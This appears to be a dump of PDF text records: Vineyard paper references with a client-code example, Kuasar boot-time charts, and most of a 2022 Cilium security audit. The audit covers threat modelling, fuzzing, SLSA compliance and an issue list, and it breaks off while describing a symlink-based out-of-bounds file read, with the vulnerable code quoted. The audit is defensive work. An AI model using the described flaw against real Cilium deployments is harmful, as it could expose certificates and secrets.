scikit-learn: Machine-Learning in Python. https://scikit-learn.org/.\n[56] Raghav Sethi, Martin Traverso, Dain Sundstrom, David Phillips, Wenlei Xie, Yutian Sun, Nezih Yegitbasi, Haozhun Jin,\nEric Hwang, Nileema Shingte, and Christopher Berner. 2019. Presto: SQL on Everything. In 2019 IEEE 35th International\nConference on Data Engineering (ICDE) . 1802–1813. https://doi.org/10.1109/ICDE.2019.00196\n[57] Konstantin Shvachko, Hairong Kuang, Sanjay Radia, and Robert Chansler. 2010. The hadoop distributed file system. In\n2010 IEEE 26th symposium on mass storage systems and technologies (MSST) . Ieee, 1–10.\n[58] Mark Slee, Aditya Agarwal, and Marc Kwiatkowski. 2007. Thrift: Scalable cross-language services implementation.\nFacebook white paper 5, 8 (2007), 127.\n[59] Levon Stepanian, Angela Demke Brown, Allan Kielstra, Gita Koblents, and Kevin Stoodley. 2005. Inlining Java Native\nCalls at Runtime. In Proceedings of the 1st ACM/USENIX International Conference on Virtual Execution Environments\n(Chicago, IL, USA) (VEE ’05) . Association for Computing Machinery, New York, NY, USA, 121–131. https://doi.org/10\n.1145/1064979.1064997\n[60] Ashish Thusoo, Joydeep Sen Sarma, Namit Jain, Zheng Shao, Prasad Chakka, Ning Zhang, Suresh Antony, Hao Liu,\nand Raghotham Murthy. 2010. Hive-a petabyte scale data warehouse using hadoop. In 2010 IEEE 26th international\nconference on data engineering (ICDE 2010) . IEEE, 996–1005.\n[61] Hongwei Wang, Fuzheng Zhang, Miao Zhao, Wenjie Li, Xing Xie, and Minyi Guo. 2019. Multi-task feature learning for\nknowledge graph enhanced recommendation. In The World Wide Web Conference . 2000–2010.\n[62] Thomas Würthinger, Christian Wimmer, Andreas Wöß, Lukas Stadler, Gilles Duboscq, Christian Humer, Gregor\nRichards, Doug Simon, and Mario Wolczko. 2013. One VM to Rule Them All. In Proceedings of the 2013 ACM\nInternational Symposium on New Ideas, New Paradigms, and Reflections on Programming & Software (Indianapolis,\nIndiana, USA) (Onward! 2013) . Association for Computing Machinery, New York, NY, USA, 187–204. https://doi.org/\n10.1145/2509578.2509581\n[63] Matei Zaharia, Mosharaf Chowdhury, Tathagata Das, Ankur Dave, Justin Ma, Murphy McCauly, Michael J Franklin,\nScott Shenker, and Ion Stoica. 2012. Resilient distributed datasets: A fault-tolerant abstraction for in-memory cluster\ncomputing. In 9th USENIX Symposium on Networked Systems Design and Implementation (NSDI 12) . 15–28.\n[64] Matei Zaharia, Reynold S Xin, Patrick Wendell, Tathagata Das, Michael Armbrust, Ankur Dave, Xiangrui Meng, Josh\nRosen, Shivaram Venkataraman, Michael J Franklin, et al .2016. Apache spark: a unified engine for big data processing.\nCommun. ACM 59, 11 (2016), 56–65.\n[65] Matei Zaharia, Reynold S. Xin, Patrick Wendell, Tathagata Das, Michael Armbrust, Ankur Dave, Xiangrui Meng,\nJosh Rosen, Shivaram Venkataraman, Michael J. Franklin, Ali Ghodsi, Joseph Gonzalez, Scott Shenker, and Ion\nStoica. 2016. Apache Spark: A Unified Engine for Big Data Processing. Commun. ACM 59, 11 (Oct. 2016), 56–65.\nhttps://doi.org/10.1145/2934664\n[66] Rong Zhu, Kun Zhao, Hongxia Yang, Wei Lin, Chang Zhou, Baole Ai, Yong Li, and Jingren Zhou. 2019. AliGraph: a\ncomprehensive graph neural network platform. Proceedings of the VLDB Endowment 12, 12 (2019), 2094–2105.\n[67] Xiaowei Zhu, Wenguang Chen, Weimin Zheng, and Xiaosong Ma. 2016. Gemini: A computation-centric distributed\ngraph processing system. 
In 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 16) .\n301–316.\n[68] Xiaowei Zhu, Guanyu Feng, Marco Serafini, Xiaosong Ma, Jiping Yu, Lei Xie, Ashraf Aboulnaga, and Wenguang Chen.\n2020. LiveGraph: A Transactional Graph Storage System with Purely Sequential Adjacency List Scans. Proc. VLDB\nEndow. 13, 7 (mar 2020), 1020–1034. https://doi.org/10.14778/3384345.3384351\nReceived November 2022; revised February 2023; accepted March 2023\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023." } ]
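The Vineyard excerpt above describes payload sharing, where get() and put() exchange only object metadata while blobs stay in shared memory. As a minimal illustration of that client-side pattern — assuming the open-source Vineyard Python client, a local vineyardd IPC socket at /var/run/vineyard.sock, and a pandas DataFrame standing in for the VYDataFrame used in the benchmark; exact method names and arguments should be verified against the Vineyard documentation — the flow looks roughly like this:

```python
import pandas as pd
import vineyard

# Connect to the local vineyardd instance over its IPC socket
# (the socket path is an assumption; deployments may differ).
client = vineyard.connect("/var/run/vineyard.sock")

# Producer: put() registers the DataFrame with vineyardd. Blobs are placed
# in shared memory, so readers on the same node avoid extra copies.
df = pd.DataFrame({"id": [1, 2, 3], "score": [0.1, 0.2, 0.3]})
object_id = client.put(df)

# persist() publishes the object's metadata so other nodes can resolve it;
# the blobs themselves are not moved.
client.persist(object_id)

# Consumer (possibly another engine or process): get() resolves the metadata
# and maps the shared blobs back into a DataFrame-like object.
shared_df = client.get(object_id)
print(shared_df)
```

In this sketch the producer and consumer may be different engines on the same cluster; persist() is the step that makes the object's metadata resolvable beyond the local vineyardd instance.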
{ "category": "Runtime", "file_name": "boot-parallel-50-time.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200 1400 1600 1800 2000CDF\nParallel boot time (ms)Kata\nKuasar" } ]
{ "category": "Runtime", "file_name": "boot-serial-1000-time.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200CDF\nSerial boot time (ms)Kata\nKuasar" } ]
{ "category": "Runtime", "file_name": "CiliumSecurityAudit2022.pdf", "project_name": "Cilium", "subcategory": "Cloud Native Network" }
[ { "data": "P R E S E N T S \nC i l i u m s e c u r i t y a u d i t\nIn collaboration with the Cilium maintainers, Open Source Technology Improvement Fund and The\nLinux Foundation\nA u t h o r s\nAdam Korczynski <\nadam@adalogics.com\n>\nDavid Korczynski <\ndavid@adalogics.com\n>\nDate: 13th February, 2023\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\nCilium security audit, 2022\nT able of contents\nTable of contents\n2\nExecutive summary\n3\nProject Summary\n4\nAudit Scope\n4\nThreat model formalisation\n5\nFuzzing\n1\n2\nSupply chain\n1\n5\nIssues\n1\n8\n2Cilium security audit, 2022\nEx ecutive summary\nIn November and December 2022, Ada Logics carried out a security audit of Cilium on behalf of the\nCloud Native Computing Foundation and the Open Source Technology Improvement Fund. The\ngoal was to undertake a holistic security audit to draw on several security disciplines and evaluate\nand improve the security of Cilium.\nEngagement objectives\nThe audit had the following high-level objectives:\n1.\nThreat model formalisation\n: This part assessed the\ncritical components of Cilium along\nwith threat scenarios and architectural considerations relevant for Ciliums security posture.\n2.\nManual code audit\n: In this part, the auditing team\nmanually audited the Cilium code base.\n3.\nImprove OSS-Fuzz fuzzing suite\n: Cilium already had\na decent fuzz test suite in place, and\nin this part the auditing team assessed the test coverage for possible improvements.\n4.\nSLSA review\n: The audit team carried out a SLSA review\nto assess the compliance level of\nCilium.\nProcess\nAda Logics commenced the engagement with an initial assessment of the Cilium project evaluating\ndocumentation, source code, previous vulnerabilities, maintainer and community responses to\ncode issues and more. The purpose of this part was to get an initial understanding of how to\naddress the hands-on part of the audit.\nNext, Ada Logics dra\u0000ed the threat model and began the fuzzing as well as manual auditing\nprocess. The threat model evolved in parallel with the fuzzing and manual work. Fuzzers were\ncommitted upstream ad-hoc and added to Ciliums OSS-Fuzz integration. Security concerns\nidentified in the manual audit were shared with the Cilium team over two occasions: Once half-way\nthrough the audit and once at the end of the audit.\nFinally, Ada Logics dra\u0000ed the report detailing the overall engagement and shared this with the\nCilium team. Together, the teams refined the report for publication.\nResults and conclusions\nIn total 13 fuzzers were added to the test suite 3 of which were written for a critical 3rd-party\ndependency to Cilium. An OSS-Fuzz integration was also set up for this dependency. 22 security\nconcerns were identified during the manual auditing.\nThe overall conclusion is that Cilium is a well-secured project. The audit found no critical or high\nseverity vulnerabilities and found a lot of positives about the security of Cilium. 
This included both\nthe code displaying positive security awareness as well as the maintainers having thorough\nunderstanding about the security posture of Cilium.\n3Cilium security audit, 2022\nProject Summary\nThe auditors of Ada Logics were:\nName\nTitle\nEmail\nAdam Korczynski\nSecurity Engineer, Ada Logics\nAdam@adalogics.com\nDavid Korczynski\nSecurity Researcher, Ada Logics\nDavid@adalogics.com\nThe Cilium community members that were involved were:\nName\nTitle\nEmail\nJoe Stringer\nSo\u0000ware Engineer, Isovalent\njoe@isovalent.com\nLiz Rice\nChief Open Source Officer, Isovalent\nliz@isovalent.com\nMathieu Payeur Levallois\nDirector of Engineering, Isovalent\nmpl@isovalent.com\nDavid Bimmler\nSo\u0000ware Engineer, Isovalent\ndavid.bimmler@isovalent.com\nMartynas Pumputis\nSo\u0000ware Engineer, Isovalent\nmartynas@isovalent.com\nNate Sweet\nSo\u0000ware Engineer, Isovalent\nnathan.sweet@isovalent.com\nAlexandre Perrin\nSo\u0000ware Engineer, Isovalent\nalex.perrin@isovalent.com\nMohit Marathe\nStudent, IIT (BHU)\nmohitmarathe23@gmail.com\nThe following facilitators of OSTIF were engaged in the audit:\nName\nTitle\nEmail\nDerek Zimmer\nExecutive Director, OSTIF\nDerek@ostif.org\nAmir Montazery\nManaging Director, OSTIF\nAmir@ostif.org\nAudit Scope\nThe following assets were in scope of the audit.\nCilium\nRepository\nhttps://github.com/cilium/cilium\nLanguage\nGo, C\n4Cilium security audit, 2022\nThreat model formalisation\nIn this section we outline the threat model of Cilium. We first outline the core components of\nCiliumʼs architecture. Next, we specify the threat actors that could have a harmful impact on a\nCilium deployment. Finally we exemplify several threat scenarios based on the observations made\nin the architecture overview and the specified threat actors.\nThe threat modelling has been conducted based on the following public resources:\n●\nCiliumʼs documentation including README files from Ciliums repository.\n●\nCiliumʼs source code at\nhttps://github.com/cilium/cilium\n.\n●\n3rd-party literature, documentation and media.\n●\nFeedback from Cilium maintainers\nThe intended audience for the threat model is the three target groups:\n1.\nSecurity researchers who wish to contribute to the security posture of Cilium.\n2.\nMaintainers of Cilium.\n3.\nUsers of Cilium.\nIt is expected that the threat model evolves over time based on both how Cilium and adoption\nevolves. As such, threat modelling should be seen as an ongoing effort. Future security disclosures\nto the Cilium security team are opportunities to evaluate the threat model of the affected\ncomponents and use cases of the reported disclosure.\n5Cilium security audit, 2022\nCilium architecture\nDaemon\nThe Cilium daemon runs on each node in the cluster and interacts with the container runtime and\nKubernetes via plugins to set up networking and security policies. At a high-level, it accepts\nconfiguration via Kubernetes or APIs that describe networking, service load-balancing, network\npolicies, and visibility & monitoring requirements.\nThe daemon listens for events from orchestration systems such as Kubernetes to learn when\ncontainers or workloads are started and stopped. It manages/creates the eBPF programs which the\nLinux kernel uses to control all network access in / out of those containers.\nSource files\n●\nhttps://github.com/cilium/cilium/tree/master/daemon\nPolicy repository\nThe policy repository has a list of policy rules that collectively make up a security policy. 
It is\ncreated by the Daemon when the core policy components are initialised. The Daemon is the only\ncomponent that interacts with the policy repository. Some actions performed by the Daemon\nagainst the policy repository are:\n●\nAdding new policy rules\n●\nDeleting policy rules\nCNI Plugin\n6\nCilium security audit, 2022\nCilium interacts with Kubernetes via Kubernetesʼ Container Network Interface. Kubernetes starts\nCiliums CNI Plugin when a pod gets scheduled or stopped on a node.\nMost logic of the CNI plugin is in its\nmain.go\n, where\nthe\nADD\n,\nCHECK\n,\nDEL\ncommands are\nimplemented.\nSource files:\n●\nhttps://github.com/cilium/cilium/tree/master/plugins/cilium-cni\neBPF Datapath\nOne of the central innovations in Cilium is the use of eBPF programs to observe and filter events in\nthe kernel. This is achieved by having eBPF programs attached to hook points, including within the\neXpress Data Path and in the traffic control subsystem. Specifically, the hooks applied by eBPF can\nbe summarised as follows:\n1.\nXDP\n: An early XDP BPF hook that is triggered at the\nearliest possible point in the network\ndriver. The program runs when a packet is received.\n2.\nTraffic control (tc)\n: The next eBPF program is invoked\na few steps a\u0000er the networking\nstack has carried out initial processing of the packet. At this stage, Cilium has access to the\nsk_buff (socket buffer).\n3.\nSocket hooks\n: When the packet reaches Layer 4, Cilium\nhas eBPF programs that attach to a\ncgroup and run on TCP events. “The socket send/recv hook runs on every send operation\nperformed by a TCP socket. At this point the hook can inspect the message and either drop\nthe message, send the message to the TCP layer, or redirect the message to another socket.\nCilium uses this to accelerate the datapath redirects as described below.”\n1\nThe eBPF programs are run at the kernel level and, therefore, operate at a privileged level of the\nsystem where access could theoretically impact the integrity of the system. However, eBPF\nprograms are written in a subset of the C programming language that helps reduce the complexity\nof the programs, e.g. by disallowing unbounded loops to avoid deadlocks, and the impact of this is\nthat the programs become more simple to analyse. The subset of C does not itself guarantee\nmemory safety of the programs, however, to ensure further safety and guard against potential\nissues, the eBPF programs must be accepted by the eBPF verifier before being loaded into the\nkernel [\nhttps://docs.kernel.org/bpf/verifier.html\n].\n1\nhttps://docs.cilium.io/en/stable/concepts/ebpf/intro/#:~:text=The%20socket%20send,as%20described%20b \nelow\n.\n7Cilium security audit, 2022\nThreat actor enumeration\nIn this section we define the threat actors that we considered throughout the audit. These actors\nare defined pro-actively from studying the architecture of Cilium, and also by using a bottom-up\napproach based on findings in the Cilium code. Buttom-up in this context means when a coding\nissue is found we reason about what type of potential attacker can leverage such an issue.\nThreat actors is a classification of a person or group of people that could actively seek to negatively\nimpact Ciliums security posture and/or use flaws in Ciliums security posture to negatively impact\nusers of Cilium. 
In an attack scenario, a threat actor answers the question: “Who would carry out\nthis attack?”.\nActor\nDescription\nCilium contributor\nCilium is an open-source project that accepts contributions from the\ncommunity. Contributors can intentionally or unintentionally\ncommit vulnerable code to Cilium.\nCilium maintainer\nA person that maintains the public Cilium code repository and is \nconsidered a gatekeeper for additions to the project.\n3rd-party dependency \ncontributors\nCilium uses open-source dependencies, many of which accept \ncontributions from the community. A 3rd-party dependency \ncontributor is a person who contributes code to projects in Ciliums \ndependency tree.\n3rd-party dependency \nmaintainer\nA 3rd-party dependency maintainer is a person that manages public \ncode repositories that Cilium depends on.\nInternal user with limited \nprivileges\nAn actor that has access to a host that runs Cilium, but who has \nlower privileges than Cilium itself.\nInternal attacker\nAn actor that has escaped a container on a host running Cilium.\nExternal attacker\nExternal attacker on the internet.\nCilium administrators\nCilium administrators manage the Cilium clusters.\n8Cilium security audit, 2022\nThreat surface enumeration\nIn this section we iterate through the threat surface that we considered when auditing the code.\nThis was created iteratively as the audit progressed and the more we learned about the Cilium\ncodebase.\nPolicy enforcement bugs\nCiliumʼs policy model must be robust, secure and consistent. Users should be able to specify\npolicies that Cilium follows. Implementation errors in the policy enforcement code can lead to\nissues, e.g. policies are assumed to block something they do not block. In this context we are\nreferring to implementation issues in Cilium and not issues written in the policies themselves (for\nwhich there are suitable tools for learning and cra\u0000ing policies\nhttps://networkpolicy.io\n). Users\nshould be able to expect their policies to be enforced correctly by Cilium, however, implementation\nerrors may allow an attacker to circumvent an ill-enforced policy. There are two examples of this in\npast advisorised\nhttps://github.com/cilium/cilium/security/advisories/GHSA-wc5v-r48v-g4vh\nand\nhttps://github.com/cilium/cilium/security/advisories/GHSA-c66w-hq56-4q97\nIssues in the eBPF code\nThe eBPF programs of Cilium are susceptible to logical issues (note, we found no such issues in the\nactual auditing). This includes any filtering that they may promise from a logical perspective but do\nnot successfully enforce. For example, in the event the user specifies certain policies then these\npolicies must be accurately handled by the eBPF programs.\nThe Linux kernel eBPF verifier performs an exhaustive analysis of the eBPF programs, including\nanalysis of all possible execution paths, range analysis and more, which together ensure the safety\nof a given eBPF program. The verifier has been under thorough analysis, such as academic research\nfocusing on formal verification of its range analysis\n[\nhttps://sanjit-bhat.github.io/assets/pdf/ebpf-verifier-range-analysis22.pdf\n].\nThe consequence of\nthis is that the eBPF programs come with a high standard of security by default with respect to\nmemory corruption issues. 
For these reasons and due to timing constraints, in this audit we do not\ninspect the eBPF programs for possible memory corruption issues as problems in this context\nshould be caught by the verifier.\nIn general, the security of Ciliumʼs eBPF programs are dependent on the eBPF verifier as well as the\neBPF compiler toolchain. The verifier itself is complex and not limited to the same subset as eBPF\nprograms, and has previously had issues e.g. CVE-2020-8835. Therefore, limitations in the eBPF\nverifier or eBPF compiler toolchain can impact the integrity of the kernel when used with so\u0000ware\nsuch as Cilium.\nImportantly in this context is that\na\u0000er Cilium runs on the node, the node cannot run\nunprivileged eBPF programs because Cilium disables this ability for the rest of the kernel run time\n(using\nsysctl kernel.unprivileged_bpf_disabled=1)\n.\nThis is done in Cilium in order to prevent the\nclass of verifier vulnerabilities like CVE-2020-8835. This is also described here:\nhttps://docs.cilium.io/en/stable/bpf/#hardening\n.\nKvstore\n9Cilium security audit, 2022\nCilium can share data about cluster-wide state with all Cilium agents in two ways: in CRDʼs or in a\nglobal key-value store. The two production-grade key-value stores supported are etcd and Consul,\nwith etcd being the most widely used. Cilium agents connect to the key-value store and obtain the\ndata in the kv-store to effectuate the desired state across pods:\nIf Cilium is deployed in kv-store mode, the Cilium etcd/Consul endpoints represent an attack\nsurface for the cluster which an attacker with local network access could attempt to exploit. If an\nattacker was able to compromise the kv-store instance to a degree where they could modify the\nentries of the store, they would de-facto have full control of the cluster.\nThis attack surface exists even if Cilium is not deployed in kv-store mode, in that Kubernetes per\ndefault uses etcd. As such, Ciliumʼs kv-store mode does not expose increased attack surface but\ndepends on Kubernetesʼ threat model for Cilium-specific configuration data.\nProper configuration by the Cilium user of the kv-store is critical in preventing exploitation of the\nadded attack surface from the kv-store.\nDepending on the configuration of the cluster, an attacker could utilize other properties of the\nkv-store deployment. If the kv-store runs in a container with root privileges, the attacker has a\nhigher chance of escalating to other nodes in the cluster.\nSupply-chain & runtime environment attacks\nCilium acts as a framework to route traffic through the Linux Kernelʼs eBPF runtime in cloud-native\nuse cases. As such, the security of Kubernetes and the Linux Kernel affects Cilium users in several\nways. From one side, vulnerabilities in either Kubernetes or the Linux Kernelʼs eBPF\nimplementation may bring Cilium users at risk despite the root cause not stemming from Cilium\nitself. From another side, Cilium may not interact with these 3rd-party ecosystems - like Kubernetes\nthe eBPF datapath - correctly which could lead to security issues.\nBesides large ecosystems like Kubernetes and the Linux kernel, Cilium also depends on 3rd-party\nlibraries for specific functionality in Cilium. A malicious attacker may find vulnerabilities in or\nintentionally commit vulnerable code to a 3rd-party dependency of Cilium. This could have an\neffect on Ciliums security posture. The attack surface through 3rd-party dependencies varies based\non the extent to which the dependencies are used. 
For example, the library\ngithub.com/vishvananda/netlink\nis widely used across\nthe entire cilium repository, whereas others\nare only used in tests.\n10\nCilium security audit, 2022\nAs an example, Cilium has previously been affected by vulnerabilities in Envoy which Cilium uses to\nenforce certain L7 policies. These are described in detail here:\n●\nhttps://github.com/cilium/cilium/security/advisories/GHSA-6hf9-972x-wff3\n●\nhttps://github.com/cilium/cilium/security/advisories/GHSA-9hx8-3wfx-q2vw\nWe highlight here that the SLSA review given below outlines several of the practices that Cilium\ndeploys to protect against supply chain security attacks.\nComplex code assumptions regarding trusted input\nThroughout the audit we found several pieces of code that alone did not constitute a security\nvulnerability. However, the code had certain properties where minor changes in the code base\ncould result in security vulnerabilities without necessarily being obvious. Issue 4 and 5 are\nexamples of this, where unbounded memory allocation happens. At the given moment we did not\nfind these issues to be vulnerable, however, it is code that may be re-used improperly at a later\nstage can introduce a potential issue, where it may not be obvious that it is improperly re-used.\nIn essence, we consider this as an instance of complex code where assumptions of input to\nfunctions are not obvious. Consequently, it is not obvious from the code that it is indeed safe,\nwhere it could be made more obvious. A complex code base has security implications on the\nproject - albeit indirectly. Complex code conceals vulnerabilities which in turn makes them arduous\nto identify in merged code and during code reviews before the code is even merged. In addition,\ncomplex code increases the overhead of contributing to the project which in turn might lead to\nfewer security issues being uncovered by the community.\n11Cilium security audit, 2022\nFuzzing\nHaving high fuzz test coverage is an important element of the security measures of a project. At the\ncommencement of this audit, Cilium had carried out extensive work to integrate fuzzing in a\nprevious fuzzing audit also performed by Ada Logics. In this security audit, Ada Logics did an\nassessment of where the project could improve its fuzzing. The high-level tasks that we carried out\nwere:\nImprove test coverage of Cilium\nAda Logics wrote 10 fuzzers targeting policy handling as well as use of critical dependencies.\nAdd fuzzing to critical 3rd-party library\nAda Logics made an initial integration on OSS-Fuzz for the extensively usedgithub.com/vishvananda/netlink\ndependency. 
In addition\nwe wrote 3 fuzzers for APIs used\nby Cilium.github.com/vishvananda/netlink\nhas not\nbeen integrated into OSS-Fuzz at this\ntime due to lack of upstream response.\nCilium Fuzzers written during the audit\n#\nName\nPackage\n1FuzzCiliumNetworkPolicyParsepkg/k8s/apis/cilium.io/v2\n2FuzzCiliumClusterwideNetworkPolicyParsepkg/k8s/apis/cilium.io/v2\n3FuzzTestpkg/policy\n4FuzzRegenerateGatewayConfigspkg/egressgateway\n5FuzzParseCEGPpkg/egressgateway\n6FuzzGetLookupTablepkg/maglev\n7FuzzRoutespkg/testutils\n8FuzzListRulespkg/testutils\n9FuzzMapSelectorsToIPsLockedpkg/fqdn\n10FuzzNodeHandlerpkg/datapath/linux\nFuzzer descriptions\nFuzzCiliumNetworkPolicyParse\nParses a pseudo-randomized CiliumNetworkPolicy.\nFuzzCiliumClusterwideNetworkPolicyParse\n12Cilium security audit, 2022\nParses a pseudo-randomized CiliumClusterwideNetworkPolicy.\nFuzzTest\nCreates a pseudo-randomized api rule and calls its resolveEgressPolicy method.\nFuzzRegenerateGatewayConfigs\nCreates a Manager with pseudo-random nodes and policy configs and invokes the managers\nregenerateGatewayConfigs() method.\nFuzzParseCEGP\nParses a pseudo-randomized CiliumEgressGatewayPolicy.\nFuzzGetLookupTable\nPasses a pseudo-randomized map of backends to GetLookupTable().\nFuzzRoutes\nPasses a pseudo-randomized Route to multiple APIs in pkg/datapath/linux/route.\nFuzzListRules\nPasses a pseudo-randomized Rule to ListRules().\nFuzzMapSelectorsToIPsLocked\nPasses a pseudo-randomized map of FQDNSelectors to MapSelectorsToIPsLocked().\nFuzzNodeHandler\nCreates a linux node handler and a Node and passes the node to multiple methods of the linux\nnode handler.\nNetlink Fuzzers written during the audit\n#\nName\nPackage\n1FuzzLinkByNamenetlink\n2FuzzDeserializeRoutepkg/k8s/apis/cilium.io/v2\n3FuzzParseRawDatapkg/policy\nFuzzLinkByName\nPasses a pseudo-random string toLinkByName()\nwhich\nreturns aLink\n. Passes thatLink\ntoAddrList()\n.\nFuzzDeserializeRoute\nPasses raw data todeserializeRoute()\n.\n13Cilium security audit, 2022\nFuzzParseRawData\nPasses raw data toparseRawData()\n.\n14Cilium security audit, 2022\nSupply chain\nScorecard\nAt the time of this audit, Cilium has not integrated the Scorecard project.\nScorecard is an open source tool that helps projects assess security risks in their code base. It\nperforms a series of checks and scores the overall security posture on a scale from 1-10. If the\nproject scores low, Scorecard will provide recommendations for remediation and mitigation.\nCilium can use Scorecard for its own repository to increase transparency on the overall security\nposture of the project. This will help demonstrate what Cilium is doing right, and it will make it\nclear to the community which actionable issues require contributions. Integrating Scorecard into\nCilium would add the OpenSSF Scorecard badge to the README, where Cilium also has the\n“OpenSSF best practices” badge.\nThe Cilium community could consider requiring 3rd-party dependencies to integrate with\nScorecard to increase transparency of Ciliumʼs own supply chain. We recommend discussing this in\na public Github issue. In case this is something the community would like enforced, it too could be\na shared effort to bring Scorecard to Ciliums own supply chain.\nMore information on Scorecard can be found below:\n●\nhttps://securityscorecards.dev\n●\nhttps://github.com/ossf/scorecard\nSLSA review\nSLSA is a framework designed to mitigate threats against the so\u0000ware supply chain. 
Its\npurpose is to ensure integrity and prevent tampering of so\u0000ware artifacts. SLSA aims to\nensure the integrity of the source, the build and the availability of so\u0000ware artifacts\ntodefend against a series of known attack vectors of the so\u0000ware supply-chain\n2\n.\nOverall, Cilium is not yet SLSA 1 compliant, but with a few improvements can reach level 3.\nAda Logics follows the specification of SLSA v0.1 that is outlined here:\nhttps://slsa.dev/spec/v0.1/requirements\n. This version\nof the compliance requirements is\ncurrently in alpha and is likely to change.\nGiven the early stages of SLSA, projects looking to comply should consider compliance to\nbe an on-going process with regular assessment on whether all requirements are satisfied.\nEven when SLSA levels are met, Cilium should work actively on maintaining the achieved\n2\nhttps://slsa.dev/spec/v0.1/threats\n15Cilium security audit, 2022\nlevels, and we recommend that future security audits include an assessment on how\nCilium performs in maintaining the achieved SLSA compliance level. In this audit, several\nof the requirements were assessed by Cilium maintainers, and as a consequence of this\nintrospective work, we - Ada Logics - consider the Cilium project to be self-sustaining in\nprogressing with compliance. A Github issue has been created here for that purpose:\nhttps://github.com/cilium/cilium/issues/22740\n.\nCilium performs well in the Source and Build categories and meets most requirements in\nthese categories up to and including level 3.\nThe “Two-person viewed” criteria under “Source” is fulfilled, since two Cilium maintainers\nare involved in merging pull requests. Not all pull requests are explicitly approved by the\nsecond maintainer, and we recommend that the second maintainer involved in a\npull-request review approves it before merging to avoid doubt of fulfilling this\nrequirement.\nThe primary missing domain for SLSA compliance is the provenance which is not\ngenerated during releases. The\nhttps://github.com/slsa-framework/slsa-github-generator\nproject offers a series of tools to generate SLSA level 3-compliant provenance attestation\nfor Github-hosted projects. These tools are created to specifically satisfy the\nprovenance-section of the three SLSA categories and will be a useful addition to Ciliums\nSLSA compliance. When Cilium makes the provenance available, it has achieved SLSA level\n1 compliance.\nSLSA compliance overview\nRequirement\nSLSA 1\nSLSA 2\nSLSA 3\nSLSA 4\nSource\n- Version controlled\n✓\n✓\n✓\nSource\n- Verified history\n✓\n✓\nSource\n- Retained indefinitely\n✓ (\n18 \nmo.)\n✓\nSource\n- Two-person reviewed\n✓\nBuild\n- Scripted build\n✓\n✓\n✓\n✓\nBuild\n- Build service\n✓\n✓\n✓\nBuild\n- Build as code\n✓\n✓\nBuild\n- Ephemeral environment\n✓\n✓\n16Cilium security audit, 2022\nBuild\n- Isolated\n✓\n✓\nBuild\n- Parameterless\n✓\nBuild\n- Hermetic\n⛔\nBuild\n- Reproducible\n⛔\nProvenance\n- Available\n⛔\n⛔\n⛔\n⛔\nProvenance\n- Authenticated\n⛔\n⛔\n⛔\nProvenance\n- Service generated\n⛔\n⛔\n⛔\nProvenance\n- Non-falsifiable\n⛔\n⛔\nProvenance\n- Dependencies complete\n⛔\nCommon\n- Security\nNot defined by SLSA requirements\nCommon\n- Access\n✓\nCommon\n- Superusers\n✓\n17Cilium security audit, 2022\nIssues\nThis section presents issues found during the audit. 
Find an up-to-date report on the status\nof these issues at https://github.com/cilium/cilium/issues/23121\n#\nTitle\nSeverity\n1\nOut of bounds file read in certificate manager\nGetSecrets()\nLow\n2\nMissing central documentation on using Cilium securely\nMedium\n3\nHandlers of the Cilium Docker plugin do not limit the size of the http request\nbody before decoding it.\nInformational\n4\nPossible memory exhaustion from CNI template rendering\nInformational\n5\nPossible excessive memory allocation\nLow\n6\nRace condition in Hubble Relay Peer Manager\nLow\n7\nRace condition in\npkg/policy.Repository.LocalEndpointIdentityRemoved()\nLow\n8\nDeprecated 3rd-party library\nInformational\n9\nTOCTOU race condition in endpoint file move helper function\nLow\n10\nRedundant return statements\nInformational\n11\nRedundant imports\nInformational\n12\nRedundant function parameters\nInformational\n13\nTOCTOU race condition in sockops\nbp\u0000oolLoad\nLow\n14\nLevel of trust for input from cloud providers is too high\nLow\n15\nBGP configuration file is read entirely into memory\nLow\n16\nRace condition when starting operator apiserver\nLow\n17\nBad code practice: Identical identifier of import and variable\nLow\n18\nDeadlock from locked mutex\nMedium\n19\nPossible type confusions\nLow\n20\nIll-defined contexts\nInformational\n21\nUse of deprecated TLS version\nInformational\n22\nDeprecated function calls\nLow\n18Cilium security audit, 2022\n1: Out of bounds file read in certificate managerGetSecrets()\nOverall severity:\nLow\nID:\nADA-CIL-1\nLocation:\nhttps://github.com/cilium/cilium/blob/e4af2f9a0c28c84090c7142e241 \nc2749a3f84ed9/pkg/crypto/certificatemanager/certificate_manager.go \n#L42\nCWE:\n●\nCWE-125: Out-of-bounds Read\nDescription\nAn attacker that can create a symlink in thecertPath\nof a given namespace can potentially read\nfiles outside of thecertPath\n.\nhttps://github.com/cilium/cilium/blob/314ca7baef f4f568f fc0bad95124e40665b1f88c/pkg/crypto/certificatemanager/ \ncertificate_manager .go#L42\nfunc(m *Manager)GetSecrets(ctx context.Context,secret *api.Secret, nsstring) (string,map[string][]byte, error) {...nsName := filepath.Join(ns, secret.Name)...certPath := filepath.Join(m.rootPath, nsName)files, ioErr := os.ReadDir(certPath)ifioErr ==nil{secrets :=make(map[string][]byte,len(files))for_, file :=rangefiles {varbytes []byte\npath := filepath.Join(certPath, file.Name())bytes, ioErr = os.ReadFile(path)ifioErr ==nil{secrets[file.Name()] = bytes}}\niflen(secrets) ==0&& ioErr !=nil{returnnsName,nil, ioErr}returnnsName, secrets,nil}secrets, err := m.k8sClient.GetSecrets(ctx, ns, secret.Name)returnnsName, secrets, err}\nThe root cause of the issue is thatos.ReadFile()\nresolves symlinks. For example, an attacker\ncould create a symlink in certPath with the filename “tls.key” linking to a cert file elsewhere on the\nmachine. m.GetSecrets would then first read all the files in certPath:\nfiles, ioErr := os.ReadDir(certPath)\n19Cilium security audit, 2022\nCilium then proceeds to read filenames. Here,path\nwould be correct, but Cilium would resolve a\nsymlink. 
